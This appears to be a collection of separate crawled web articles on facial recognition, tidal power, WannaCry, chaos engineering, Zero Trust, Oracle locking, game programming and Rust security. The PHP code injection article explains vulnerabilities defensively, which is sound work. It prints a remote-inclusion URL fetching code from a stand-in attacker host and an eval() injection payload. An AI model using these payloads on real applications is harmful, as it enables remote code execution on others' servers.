Artificial intelligence has long been watching our online and data selves. Now, it’s watching us in the physical world too. Facial recognition technology has given eyes to AI, allowing it to ‘see’ and analyse us in the flesh. This ability has met obvious reservations. Indeed, concerns abound that we are heading for an Orwellian dystopia. Big Brother could soon exist in the form of AI — monitoring our actions both on and offline. But facial recognition tech is also beginning to prove useful for businesses. It holds the potential for better safety, security and personalisation. So, what does the future hold for the fledgling AI branch? Howard Williams from Parker Software (opens in new tab) investigates. The state of facial recognition Facial recognition is one of the biggest buzzwords of the decade. Facial recognition AI uses machine learning to allow computers to recognise and verify human faces. As AI and image recognition advances, so too does the accuracy of facial recognition. Some claim that facial recognition technology is already more accurate than most might expect. In fact, it’s achieved scores of 98.52 (opens in new tab) per cent accuracy in one study. However, this is dependent on specific criteria, such as clear images of a single person. In crowds, accuracy drops significantly. There are also reports of issues with AI identifying people of colour. Not to mention how easy it is to fool. Indeed, it’s much easier to find reports of facial recognition AI with 98 (opens in new tab)per cent inaccurate results. And this is a cause for some concern. Heading for a dystopia Beyond the natural change aversion (opens in new tab) that tends to accompany new technology, facial recognition feeds more serious concerns. This is down to the fact that its use is already growing in law enforcement and surveillance. Despite, that is, its accuracy issues. The concerns and fears around the current state of facial recognition AI boil down to ethical issues. Namely, the apparent loss of privacy brought by use of the tech. (Particularly in the case of surveillance (opens in new tab).) The issue is, for facial recognition AI to work, it needs images of faces to compare and learn from. In some cases, this might be as simple as temporarily storing images of your face as you enter certain places. For example, if the AI needs to confirm two images are of the same person. Already, then, you could have cameras and computers ‘watching’ your movements throughout the day. However, for it to then identify you, it needs access to stored data about you. So, there’s some personal information required. The result is a scary public introduction to facial recognition AI. It’s generating the fear that Big Brother AI will soon be watching our every move. Other ethical concerns Privacy isn’t the only concern that has people worried about facial recognition AI. There are also issues surrounding the training of the system, and the potential outcomes of relying too much on the technology. For example, there’s an issue with where and how companies collect the training (opens in new tab) data for the AI. The worry is that many data sets were collected without explicit permission from the individuals involved. Some cases have allegedly seen face data scraped from photo apps, for example. The issue is, many official face data sets don’t hold enough data or diversity to teach an AI system. This means without more faces to feed to the AI, you get a poor tool with plenty of bias (opens in new tab). Another concern surrounds the issues of accuracy. Namely, the repercussions of false positives if law enforcement relies too heavily on inaccurate AI. What happens to an innocent person facing accusations due to an AI misidentification? The potential of facial recognition On the flipside of the coin, facial recognition technology could take a different route. Stepping away from the dark side of facial recognition AI use, the future stands to be much brighter. Already, businesses are starting to see the value in facial recognition (opens in new tab). In fact, it’s a technology that could prove beneficial no matter the industry you’re in or what your business offers. It supports security, it’s useful in healthcare, and boosts personalisation in retail. As a new technology, the scope of its ability is still growing. Indeed, facial recognition AI could become an extremely versatile tool. Safety, security and personalisation Facial recognition AI could boost the safety of your business. For instance, it provides a potential way to combat theft. The computer system could scan faces as they enter the store, and check against a database of known offenders. Or, the technology could provide a new form of authentication. Keys to your buildings are no longer lost if people unlock the doors with their face, for example. Here, facial recognition AI could recognise the face of someone trying to unlock a building or device. Then, it could check the image against a database of your employees. This would ensure only those authorised can gain entry. But facial recognition doesn’t just need to revolve around security. It can also boost your personalisation efforts. You could have a system that recognises customers by face as they walk into your shop. Then, it can pull their data from your CRM to help your employees tailor service to them. Facial recognition AI acceptance So, what needs to happen for people to accept this form of AI (opens in new tab) use? - Address privacy concerns Be transparent about the use of facial recognition AI and why you need it. Keep clear how it benefits the consumer. Make sure that you have permission to collect their facial data and make it clear how and when you will delete it. - Remember it’s a tool It’s important to remember that (at least for the foreseeable future) facial recognition AI is not infallible (opens in new tab). Plus, as with any AI, the output you receive is best taken alongside human understanding. In other words, use it as a tool to inform decisions, not a brain to make them. Approaching a crossroads We stand now at a crossroads. In one direction, an Orwellian dystopia with no privacy and total surveillance. In the other direction, a reality of increased personalisation and embraced individuality. It’s true that the technology could lead to a real Big Brother. But it can also revolutionise our businesses. It could improve security and add another layer of personalisation to customer service. Facial recognition AI is a tool. It's no different from other functions of artificial intelligence, or automation, or any other software. And, as with any tool, how we use it is up to us. Howard Williams, customer experience, Parker Software (opens in new tab) Image Credit: Sergey Nivens / Shutterstock
<urn:uuid:f67b6185-552b-41be-bf6f-1a75d24c7838>
CC-MAIN-2022-40
https://www.itproportal.com/features/big-brother-ai-is-watching-you/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335530.56/warc/CC-MAIN-20221001035148-20221001065148-00021.warc.gz
en
0.942424
1,427
2.734375
3
The European Marine Energy Centre (EMEC) has announced the connection of the world’s most powerful tidal turbine to the national grid for the first time. The power’s O2 is connected to the mainland via sub-sea cable to the 2MW offshore unit and then on to the local onshore electricity network. The O2 received 3.4 million pounds in funding from the Scottish Government in 2019. The company Orbital Marine Power then used the money to develop a tidal turbine that is capable of powering more than 1,700 homes each year. The O2 is the firm’s first commercial turbine which is 74 metres long and is expected to operate in the waters off Orkney for around 15 years “Our vision is that this project is the trigger to the harnessing of tidal stream resources around the world to play a role in tackling climate change whilst creating a new, low-carbon industrial sector,” Andrew Scott, CEO at Orbital, said. “We believe pioneering our vision in the UK can deliver on a broad spectrum of political initiatives across net-zero, levelling up and building back better at the same time as demonstrating global leadership in the area of low carbon innovation that is essential to creating a more sustainable future for the generations to come.” The O2 has the capacity to provide clean and predictable energy to meet the annual demands of around 2,000 British homes. Additionally, the O2 is to provide power to EMEC’s onshore electrolyser to generate green hydrogen that will be used to demonstrate decarbonisation of wider energy requirements.
<urn:uuid:a4e06144-ec2c-4561-a2f6-c177596501ba>
CC-MAIN-2022-40
https://digitalinfranetwork.com/news/uk-grid-to-be-connected-with-worlds-most-powerful-tidal-turbine/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337322.29/warc/CC-MAIN-20221002115028-20221002145028-00021.warc.gz
en
0.926342
325
2.546875
3
The University of Essex opened today a new laboratory to study the effects of mobile phones mast on human health, including the new 3G masts. The Electromagnetics and Health (EMH) Laboratory will be used to study the impact of electromagnetic fields on health. The project is led by the Department of Psychology at the University and funded by the Mobile Telecommunications and Health Research Programme. Nearly 20,000 people already surveyed in Essex to find out what proportion reported sensitivity to electromagnetic fields. The people will be exposed to electromagnetic signals from mobile phones masts, 3G masts, and to no signals at all, and be asked to note down any symptoms they experience. Mobile phone technology and usage continues to develop, and it is vital that research into potential health risks keeps pace. Our new laboratory at Essex is equipped to play an important role in understanding the effects of the electromagnetic fields generated by mobile-phone base stations on human health,” said Professor Elaine Fox. The research project is set to last two years.
<urn:uuid:569ab255-2517-4a33-9802-03afac40472c>
CC-MAIN-2022-40
https://it-observer.com/study-investigate-3g-health-effects.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337432.78/warc/CC-MAIN-20221003200326-20221003230326-00021.warc.gz
en
0.932709
209
2.984375
3
Perhaps the truly surprising aspect of Wannacry is that it did not happen sooner. Exploitation of a security flaw on this scale has long been on the cards and this headline-grabbing piece of ransomware, which affected organisations around the world, has underlined the vulnerability of private and public sector networks. Of course, the way Wannacry worked meant it was particularly effective: the malware reproduced itself like a worm, so it was able to scale rapidly and we will probably continue to see its after-effects for some time. While the initial scare may already be old-news, the worry is that organisations are still not protected against similar future threats, which while may not be as innovative as Wannacry, could still cause mass devastation. Surely, these organisations have made substantial investments in information security solutions and strategies designed to protect users and data? What about, for example, intrusion detection and prevention systems, multi-AV engines, anti-phishing, application control, deep packet inspection (DPI), URL filtering and APT protection? Why aren’t they upgrading to the latest operating systems and patches to protect themselves better? In reality, many organisations have most definitely taken their security responsibilities very seriously, but the traditional approach to security means updating and patching all the systems, applications and devices, which is often just not feasible. The efficacy of existing infosec investments is under-mined. Think about it: most professional workers will have access to at least one device, if not several: a desktop system, a laptop, a smartphone, smart-watches and other internet-enabled devices. As the Internet of Things (IoT) continues to grow, the range of end points that need protecting will probably keep on expanding. Extrapolate that across an organisation with hundreds or thousands of employees, plus all the operating systems and applications being run and it is easy to see how updating and patching becomes such a monumental challenge. There are other complications, in particular the fact that – somewhat ironically – security and compliance requirements forbid modifications, thus preventing updates, therefore contributing to possible vulnerabilities. For instance, in a manufacturing firm, software-driven production equipment is mission-critical. Security reasons often mean that their control systems cannot be modified, which explains why so much legacy equipment is being run on older software versions, even beyond their EOL. That situation is not about to change any time soon, because those IT investments have a shelf-life of many years, even decades. Similarly, in highly regulated markets such as automotive and healthcare, compliance requirements hinder any modifications to existing systems. Beyond those barriers, the sheer cost and effort involved in updates and patching can be prohibitive, so critical security updates may not be implemented immediately, often not for quite a while. Remember the SSL security flaw Heartbleed in 2014? Three years after it was made public, hundreds of thousands of systems connected to the Internet were still unpatched (opens in new tab). It is hardly surprising that many organisations follow the ‘never change a running system’ philosophy, because large-scale updates can lead to errors, performance problems or – worst case scenario – bring the organisation to a halt. For instance, in 2014, updates to several versions of Windows led to a spate of ‘blue screen’ fails, with Microsoft asking users to manually remove the patches (opens in new tab). Similarly, in 2015, it was reported that a Windows 7 update was causing some computers to be stuck in a re-boot loop (opens in new tab). However, we are not singling out Microsoft here, pretty much every vendor – however solid and reliable – is, or can expect to, experience problems. One week after the launch of iOS 8 in 2014, Apple released and then immediately withdrew its first update of the new operating system – iOS 8.0.1 (opens in new tab). Reports were flooding in that this update was breaking cellular reception and other features, such as Touch ID for some users. Apple removed the faulty update but by that time, many users had probably gone through the installation process. A new approach is needed So, we have this conundrum: organisations want to avoid the risks, costs and time involved in patches and updates (assuming they are even able to do so), but by not doing these patches and updates, they leave themselves wide open to future threats. This is why we need to take a different approach to patching for security reasons. Of course, there is no such thing as absolute security, however protection is much more likely to be effective if it is centralised and over-arching, universally across the entire enterprise, rather than trying to protect every device separately. One possible solution could be using a cloud-based approach and ideally, led by internet providers and offered by them as an integral part of their service. That way, all customer traffic can be run through this cloud-based security layer, regardless of user devices, company operating systems or even their own security solutions. Threats are searched for before they can reach the end-user organisations, so infection is halted and there is no need for enterprises to make system modifications at their end. The key to this approach is the combination of several enterprise-grade security technologies that detect potentially unknown threats by monitoring suspicious data streams, using pre-configured security and filter policies. These are isolated in sandboxes and analysed using an advanced algorithm engine before they are allowed anywhere near a customer’s device. Harking back to Wannacry, this technique detected the ransomware before it was passed through to the users’ devices, preventing the initial infection. Being cloud-based, there is no impact on existing IT systems, nor need to install additional software, plus it can scale easily. There is no need to install software on every single user device, because the threat does not even get that far. As well as providing real-time insight into the possible threat behind IP addresses, domains, hosts and associated files, this technique can also be applied to detecting malicious bots in IoT environment. Of course, this approach to dealing with security puts the onus on telcos and ISPs, but another way of looking at it is the value that offering this service to their customers adds. It’s one way in which these providers can differentiate themselves in an increasingly price-driven world. Security services could be offered to both business customers and consumers. Wannacry was one of the worst cases of malware the world has seen so far, but it is unlikely to be the last. Given that traditional approaches to security patches – despite vast R&D and investments – aren’t stopping these threats in their tracks, it’s time for a rethink, by preventing them from reaching end user devices in the first place. Dennis Monner is CEO of Secucloud (opens in new tab) Image Credit: WK1003Mike / Shutterstock
<urn:uuid:987ab742-bc4c-4865-a186-34d2741455db>
CC-MAIN-2022-40
https://www.itproportal.com/features/how-wannacry-shows-why-we-need-to-rethink-infosecurity/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337836.93/warc/CC-MAIN-20221006124156-20221006154156-00021.warc.gz
en
0.958844
1,420
2.515625
3
What is PHP Code Injection? A code injection attack exploits a computer bug caused by processing invalid data. The attacker introduces (or injects) code into the vulnerable computer program and changes the execution. Successful code injections can introduce severe risks. For example, it can enable viruses or worms to propagate. It can result in data corruption or loss, denial of access, or complete host takeover. PHP enables serialization and deserialization of objects. Once untrusted input is introduced into a deserialization function, it can allow attackers to overwrite existing programs and execute malicious attacks. This is part of our series of articles about command injection. In this article: - How Code Injection Attacks Work - PHP Code Injection Examples - Preventing PHP Code Injections - Code Injection Protection with Bright Security How Code Injection Attacks Work Code injection attacks follow a similar pattern of manipulating web application languages interpreted on the server. Typically, a code injection vulnerability consists of improper input validation and dynamic and dangerous user input evaluation. Improper input validation User input includes any data processed by the application and manipulated or inputted by application users. It covers direct input form fields and file uploads, and other data sources like query string parameters and cookies. Applications typically expect specific input types. Neglecting to validate and sanitize the input data can allow these issues into production applications, especially when testing and debugging code. Dynamic and dangerous user input evaluation A code injection vulnerability causes an application to take untrusted data and use it directly in program code. Depending on the language, it usually involves using a function like eval(). Additionally, a direct concatenation of user-supplied strings constitutes unsafe processing. Attackers can exploit these vulnerabilities by injecting malicious code into the application language. Successful injection attacks can provide full access to the server-side interpreter, allowing attackers to execute arbitrary code in a process on the server. Applications with access to system calls allow attackers to escalate an injection vulnerability to run system commands on the server. As a result, they can launch command injection attacks. Related content: Read our guide to code injection (coming soon) PHP Code Injection Examples The code in the examples below is taken from OWASP. PHP Injection Using GET Request Consider an application that passes parameters via a GET request to the PHPinclude() function. For example, the website could have a URL like this: Where the value of the page parameter is fed directly to the include() function, with no validation. If the input is not properly validated, that attacker can execute code on the web server, like this: evilcode.php script will then run on the web server, enabling remote code execution (RCE). PHP Injection Using eval() Function This example shows how attacks can exploit the use of an eval() function, when developers pass it unvalidated, untrusted user inputs. Consider the following PHP code: $myvar = "varname"; $x = $_GET['arg']; eval("$myvar = $x;"); The problem with this code is that it uses the value of the arg URL parameter with no validation, directly in the Consider that an attacker injects the following input into the arg parameter: This will execute the phpinfo() command on the server, allowing the attacker to see system configuration. Related content: Read our guide to code injection examples Preventing PHP Code Injections Avoid Using exec(), shell_exec(), system() or passthru() In general, it is a good idea to avoid any commands that call the operating environment directly from PHP. From an attack vector perspective, this gives attackers many opportunities to perform malicious activity directly in the web server stack. In the past, functions such as passthru() were commonly used to perform functions such as compressing or decompressing files, creating cron jobs, and navigating operating system files and folders. However, as soon as these functions meet user inputs that is not specifically validated or sanitized, serious vulnerabilities arise. PHP provides functional operators with built-in escaping—for example escapeshellarg(). When these operators are used on inputs before passing them to a sensitive function, they perform some level of sanitization. However, these functions are not foolproof against all possible attacker techniques. As of PHP 7.4, archiving can be handled using the ZipArchive class which is part of any PHP compilation. This can help avoid some use of direct system functions. Avoid Using Weak Sanitization Methods Sanitization and handling of user input is paramount to PHP application security. Whenever you accept user input, you must make sure it is valid, store and process it in such a way that it does not enable attacks against the application. Remember that any input is an open attack vector that allows a malicious attacker to interact with your application. The following functions are used for sanitization by some developers, but are not really effective: htmlentities()—this function discards inputs that do not match definable UTF character sets. However, they could still allow attackers to pass some malicious payloads. These functions should not be used for input sanitization. Avoid Displaying Verbose Error Messages It is very important to turn off PHP errors in your PHP.ini configurations. Disable the ~E_WARNING to avoid error output that could be used by an attacker to identify sensitive environment information related to your PHP application and web server. Use a PHP Security Linter A linter is a development tool that scans code for errors and potential security flaws. PHP has a built-in linter, which you can run using the command PHP -l <filename>. However, its limitation is that it checks only one file at a time. PHPlint is a popular alternative that can check multiple files. It can be via the CLI or as a library run by composer. You can also add it to a Docker image easily. PHPLint can check PHP 7 and PHP 8, providing detailed output about discovered issues. Code Injection Protection with Bright Security Bright Security Dynamic Application Security Testing (DAST) helps automate the detection and remediation of many vulnerabilities including PHP code injection, early in the development process, across web applications and APIs. By shifting DAST scans left, and integrating them into the SDLC, developers and application security professionals can detect vulnerabilities early, and remediate them before they appear in production. Bright Security completes scans in minutes and achieves zero false positives, by automatically validating every vulnerability. This allows developers to adopt the solution and use it throughout the development lifecycle. Scan any PHP application to prevent PHP code injection vulnerabilities – try Bright Security free.
<urn:uuid:827d6742-a201-4a4d-b467-0f6f31c6e19f>
CC-MAIN-2022-40
https://brightsec.com/blog/code-injection-php/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338280.51/warc/CC-MAIN-20221007210452-20221008000452-00021.warc.gz
en
0.84848
1,550
3.59375
4
Are you familiar with the term “chaos engineering?” If this is the first time, you’ve heard it, it probably won’t be the last time. Chaos engineering (CE) is a new approach to resiliency testing that might end up having a big impact on how we business continuity professionals carry out our work of ensuring the recoverability of our organizations’ business processes and IT environments. In today’s post, I’ll give you a quick introduction to the movement and methodology of chaos engineering. Future posts will look at the potential impacts of CE on business continuity and IT/Disaster Recovery (IT/DR). The discipline of chaos engineering can be summed up in six words: break stuff and see what happens. Chaos engineering is a pursuit with the goal of increasing the resiliency of complex computing and software systems. It can also potentially be used to strengthen other types of systems. It emerged from the recognition that our growing dependence on our computing and network environments—together with their increasing complexity and the increasingly high costs associated with interruptions to those systems—called for greater system resiliency and hence a more rigorous approach to system testing and design. The main idea of chaos engineering is that by throwing various types of wrenches into the production environment, and seeing how the system responds, you can learn truly and accurately where your vulnerabilities are—and then you can shore them up, removing that vulnerability and increasing the resiliency of the system. The main danger, obviously, is that in throwing wrenches into your production environment you will harm your production environment, causing unpredictable and potentially serious problems where it counts. This is why it is said that chaos engineering is easy to understand but hard to do. BIRTH OF THE CHAOS MONKEY Chaos engineering originated at Netflix in 2011 with the creation of a software tool called a Chaos Monkey. Chaos Monkeys were designed to be released into the company’s systems where they would behave in a manner similar to that of a wild, armed monkey turned loose in a data center or cloud environment. The Monkey would cause random damage, and the system would then attempt to contain, mitigate, and work around that damage. The purpose of turning these virtual wrecking balls loose in their systems was to identify weaknesses and strengthen resiliency. The ultimate goal was to minimize the impact of the inevitable software and hardware failures on the end-user video streaming and viewing experience. Chaos Monkeys were so effective in helping the company probe and strengthen system resiliency that over time it developed a whole suite of similar tools, dubbed the Simian Army. The suite includes the Chaos Gorilla, Donkey Monkey, Security Monkey, and other tools. In recent years, the concept of chaos engineering has spread from Netflix to other tech companies like Google and Amazon. It now seems to poised to gain a foothold in non-technology firms. HOW IT WORKS The chaos engineering community is based on a handful of core concepts which are set forth on the website Principles of Chaos, which was initiated by Netflix. As the site says, chaos engineering experiments are intended to “uncover systemic weaknesses” and follow four steps: - Start by defining “steady state” as some measurable output of a system that indicates normal behavior. - Hypothesize that this steady state will continue in both the control group and the experimental group. - Introduce variables that reflect real-world events like servers that crash, hard drives that malfunction, network connections that are severed, etc. - Try to disprove the hypothesis by looking for a difference in steady state between the control group and the experimental group. If the steady state is hard to disrupt, then great. That’s grounds for having confidence in the system. When your experiments uncover weaknesses, put fixing them on your to-do list, so you can correct the problem before it flares up in the larger system. MINIMIZING THE “BLAST RADIUS” The Principles of Chaos website also sets forth a number of “Advanced Principles” for doing chaos engineering. These include: - Build a Hypothesis around Steady State Behavior. By focusing on systemic behavior patterns during experiments, Chaos verifies that the system does work, rather than trying to validate how it works. - Vary Real-world Events. Prioritize events either by potential impact or estimated frequency. Consider events that correspond to hardware failures like servers dying, software failures like malformed responses, and non-failure events like a spike in traffic or a scaling event. Any event capable of disrupting steady state is a potential variable in a Chaos experiment. - Run Experiments in Production. To guarantee the authenticity of the methods used when you exercise the system and their relevance to the currently deployed system, Chaos strongly prefers to experiment directly on production traffic. - Automate Experiments to Run Continuously. Running experiments manually is labor-intensive and ultimately unsustainable. Automate experiments and run them continuously. Chaos Engineering builds automation into the system to drive both orchestration and analysis. - Minimize Blast Radius. Experimenting in production has the potential to cause unnecessary customer pain. While there must be an allowance for some short-term negative impact, it is the responsibility and obligation of the Chaos Engineer to ensure the fallout from experiments are minimized and contained. According to the Principles of Chaos website, there is a strong correlation between how rigorously the above principles are followed and the confidence that can be placed in the system. CHAOS ENGINEERING AND BUSINESS CONTINUITY There are obvious parallels between the work of these chaos engineers and the work we do as business continuity and IT/DR professionals. It is likely our field can benefit from the approaches they have pioneered. In future posts, I’ll look at how the principles and practice of chaos engineering are likely to impact and improve the practice of BC and IT/DR in non-tech organizations. Another key resource on chaos engineering is the ebook Chaos Engineering: Building Confidence in System Behavior through Experiments, which was written by a team of Netflix engineers and is available for free at the link through O’Reilly Media.
<urn:uuid:c436a0a6-15a2-4e63-acc2-076b531ea0ae>
CC-MAIN-2022-40
https://bcmmetrics.com/chaos-engineering/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335396.92/warc/CC-MAIN-20220929225326-20220930015326-00222.warc.gz
en
0.940906
1,308
2.5625
3
The world of information technology sometimes feels like an old seafarer’s map showing monsters lurking in deep waters and warning, “There be danger here.” The digital world doesn’t need to be so melodramatic, but no company should ignore the warning that danger is all around. From ransomware to malware to hackers stealing private data, businesses need a strong IT infrastructure to protect against these threats. Zero Trust Architecture, or the Zero Trust model, is a highly secure method of protecting your data that has gained popularity in the last few years. It switches up the traditional idea of “trust but verify” to “never trust and always verify” and can be implemented over time with existing technology. What Does Zero Trust Mean? Zero Trust is exactly what its name implies. Trust no one entering your network no matter where they are located, whether from the security of your office or logged into the unsecured Wi-Fi of a hotel. John Kindervag, creator of the Zero Trust model, refers to the danger of the current system as “relying on a broken trust model” where there is a consistent failure to verify when a person accesses the system from a trusted source. Once the user, harmless or malicious, is past the perimeter security, they become a trusted user and have access to the network. The Zero Trust model eliminates this danger by having no trusted source or trusted user that could be overlooked in the verification process. All traffic, anywhere in the network, is subject to segmentation, authentication, and verification. According to the Zero Trust model: - All resources should be accessed in a secure way regardless of location or user. - No user receives access to all information. Strictly enforce access to information on a need-to-know basis. - All traffic going into or out of the system is inspected and logged in order to catch malicious traffic. What does this mean? Imagine your system is a battleship. Inside, there are hatches that can be sealed to cut off a breached part of the ship so the whole vessel doesn’t sink. In the current popular method, all the hatches are open once you make it inside the ship. The only barrier is the outer hull, the perimeter security of your system, and you can move freely throughout the ship without reauthenticating. In Zero Trust, every hatch on the ship is closed, and you must have the proper access codes to open each door. Once you’ve proven yourself, only the room you need information from is opened, all other hatches remain closed and protected. In order to get to information you’re not supposed to have, you’d have to break through each door one at a time, all while someone is monitoring your movement through the ship. Via network segmentation and next-generation firewalls, Zero Trust uses existing security features such as multifactor authentication, analytics, encryption, security groups, and file system permissions to secure all information and allow in only those who have proven they should have access. How Should I Start a Zero Trust Model? Zero Trust is more than just the technology—it’s a way of thinking about who has access to your network. Trying to overhaul your entire system to a Zero Trust model in one go would be expensive and confusing and could lead to downtime that your business can’t afford. It also requires a great deal of technological know-how, IT security, and consistent management in order to give appropriate access to the correct people for the intended information. For most businesses, when implementing a Zero Trust model, start small. While a complete overhaul would be costly, Zero Trust features can be easily adapted into current systems in pieces and, over the course of several years, be built into all areas of a business’s systems. Many new features of business technology, such as cloud services, already work well with the Zero Trust model and can be easily adapted. Any business wanting to begin the move to a Zero Trust model should identify a small piece of their system, such as customer personal identifying information or credit card information, and institute segmentation and authentications around that information. You can then build your Zero Trust network from there over time. Allow Managed Services to Bring Zero Trust to You The Zero Trust model is a good way to secure your information, but if you don’t have your own IT department, it can be a challenge to implement. Zero Trust requires more than an IT company to set it up, walk away, and leave it to run. It will take time and constant adjustment to bring your current network into a complete Zero Trust model. A managed IT services company like Anderson Technologies is the best way to ensure your business is moving toward a Zero Trust model. Managed IT services can offer: - equipment set up - employee training (most important) For a small business, taking the time necessary to figure out IT improvements like this on your own can hinder the daily running of your business. Don’t let security get in the way of serving your customers. Zero Trust eliminates the threat of trusting too much but only if properly installed.
<urn:uuid:04d02e8b-43ae-4b93-8d1d-795574b2e1c1>
CC-MAIN-2022-40
https://andersontech.com/trust-no-one-anatomy-new-security-model/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335573.50/warc/CC-MAIN-20221001070422-20221001100422-00222.warc.gz
en
0.931945
1,071
2.84375
3
Oracle enqueue waits indicate that a seesion is waiting for a lock that is held by another user (or sessions). For Oracle 9i, there is a specific Enqueue wait event. For Oracle 10g and later, the Enqueue wait event has been separated into more than 200 unique wait events, which each include more specific information about the related lock type. About Oracle locking In Oracle databases, many users may update the same information at roughly the same time. Locking allows one user to update data at a given moment so that another person cannot modify the same data. The data is locked by the transaction until it is committed or rolled back and this is known as data concurrency. Another purpose of Oracle locking is to ensure that all processes can always read the original data as they were at the time the query began even though other users could be modifying the underlying data. This is known as read consistency. How Oracle locking can cause problems Although locks are a necessity in Oracle, they can create performance issues. Each time a user issues a lock, another user would be prevented from processing the locked data. Oracle locking allows a variety of locks depending on the resources required – a single row, many rows, an entire table, many tables, etc. However, the larger the scope of the lock, the more users will be prevented from processing the data. The Oracle enqueue wait event is the best indication of locking in Oracle databases. Oracle 9i enqueue wait events In Oracle 9i, when a session is waiting on the “enqueue” wait event, this indicates a wait for an Oracle lock that is held by another user (or sessions) in an incompatible mode to the requested mode. When sessions are found waiting on an enqueue, the following query can be used to find out which session is requesting the lock, the type and mode of the requested lock and the session that is blocking the request: >SELECT DECODE(request,0,Holder: ,Waiter: )||sid sess, id1, id2, lmode, request, type FROM V$LOCK WHERE (id1, id2, type) IN (SELECT id1, id2, type FROM V$LOCK WHERE request>0) ORDER BY id1, request In Oracle 9i there are approximately 40 types of locks specified by the TYPE column in V$LOCK and each has a unique solution set. The following are examples of the types of locks: TX: This enqueue is a transaction lock and is typically caused by incorrect application logic or table setup issues. TM: This enqueue represents a DML lock and is generally due to application issues, particularly if foreign key constraints have not been indexed. ST: When Oracle performs space management operations (such as allocating temporary segments for a sort, allocating extents for a table, etc), the user session waits on the ST enqueue. Oracle 10g enqueue wait events Oracle 10g makes the process of analyzing locks easier by separating the “enqueue” wait event from Oracle 9i into over 200 distinct wait events. Oracle also includes more information about the lock type within the wait event name. For example, an enqueue wait event named “enq: TX – row lock contention” indicates that row locking is occurring, while “enq: TX – index contention” indicates contention on an index. In Oracle 9i, both of these sessions would have been found waiting on the “enqueue” wait event with a lock type of “TX”, so Oracle 10g definitely helps isolate the specific issue. In conclusion, Oracle 10g makes it much easier to track down the specific causes of Oracle locking problems now that the Oracle “enqueue” wait event from 9i and before has been broken up into over 200 distinct events in 10gR2.
<urn:uuid:35467474-edd0-43bc-9377-9233584deee3>
CC-MAIN-2022-40
https://logicalread.com/oracle-locking-and-enqueue-waits-dr01/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335573.50/warc/CC-MAIN-20221001070422-20221001100422-00222.warc.gz
en
0.924855
797
3.265625
3
While computer gaming remains primarily male dominated, a new study has revealed that girls may be more skilled at making story-based computer games. The research was conducted by the Informatics Department at the University of Sussex on secondary school students. They were asked to design and program their own computer game using a new visual programming language that shows pupils the computer programs they have written in plain English. The study describes the design and evaluation of Flip, a bi- modal programming language that aims to help 11-15 year olds develop computational skills through creating their own 3D role-playing games. Flip has two main components: 1) a visual language (based on an interlocking blocks design common to many current visual languages), and 2) a dynamically updating natural language version of the script under creation. This programming-language/natural-language pairing is a unique feature of Flip, designed to allow learners to draw upon their familiarity with natural language to “decode the code”. Flip aims to support young people in developing an understanding of computational concepts as well as the skills to use and communicate these concepts effectively. Researchers Dr Kate Howland and Dr Judith Good revealed that girls wrote more-and more complex- scripts than did boys, and there was a trend for girls to show greater learning gains relative to the boys. Dr Good stated: “Given that girls’ attainment in literacy is higher than boys across all stages of the primary and secondary school curriculum, it may be that explicitly tying programming to an activity that they tend to do well in leads to a commensurate gain in their programming skills.” “In other words, if girls’ stories are typically more complex and well developed, then when creating stories in games, their stories will also require more sophisticated programs in order for their games to work.” The young people, aged 12-13, spent eight weeks developing their own 3D, role-playing games, using software made available with the popular medieval fantasy game Neverwinter Nights 2, which is based on the popular Dungeons & Dragons franchise. By linking blocks together, a user can tell the game to print text, change elements of gameplay and start new missions when different events occur – like the slaying of a dragon. An array of events in the game were used as triggers for the script – for instance, when a character is killed; or says something; or moves to a different part of the screen. Girls were found to use nearly twice any many triggers as boys. While boys stuck to the most basic trigger- when a character says something, girls used up to seven different triggers and created complex scripts with two or more parts and conditional clauses more successfully. Underrepresentation of women in computing has been a pressing concern, with only 17% of CS graduates in UK being females in 2012. While the number of females taking up maths related subjects at school level has gone up. Not many girls have forayed into mainstream computer programming. Some attribute this to the portrayal of “nerdy boys” in media. However, with this new language, females can be motivated to explore programming by tapping into intuitive literary and narrative skills. Read more here. (Image credit: Lindsey Galloway)
<urn:uuid:40ad2977-8ec2-4e46-8e30-577bd5f2fa45>
CC-MAIN-2022-40
https://dataconomy.com/2014/12/study-reveals-girls-are-better-at-making-computer-games/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337338.11/warc/CC-MAIN-20221002150039-20221002180039-00222.warc.gz
en
0.961349
657
4.0625
4
Rust is a strongly typed and safe systems programming language developed by Mozilla. Over the years, it has become the language of choice to build memory-safe programs while maintaining high performance at scale. Rust is usually used for file format and protocol parsers but also on critical projects like in the new high-performance browser engine, Servo. However, coding using memory-safe language doesn’t mean the code will be bug-free. Different kinds of rust security vulnerabilities like overflows, DoS, UaF, OOB, etc. can still be found and sometimes exploited to achieve remote code execution (RCE). The goal of this course is to give you all the prerequisites to understand which kind of vulnerability can be found inside Rust code. You will learn how to find low-hanging fruit bugs manually and automatically using Rust security auditing tools. Finally, you will discover how to build custom Rust fuzzers, triage/debug crashes and improve your code coverage using different techniques. Along this training, students will deal with a lot of hands-on exercises allowing them to internalize concepts and techniques taught in class. This course is suitable for people that are new to Rust. All the theory and concepts about Rust security and Rust fuzz testing will be explained during the course.
<urn:uuid:5f0b0eb1-e214-4f43-8860-b42525cc7d0f>
CC-MAIN-2022-40
https://fuzzinglabs.com/rust-security-training/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337338.11/warc/CC-MAIN-20221002150039-20221002180039-00222.warc.gz
en
0.926513
263
3.484375
3
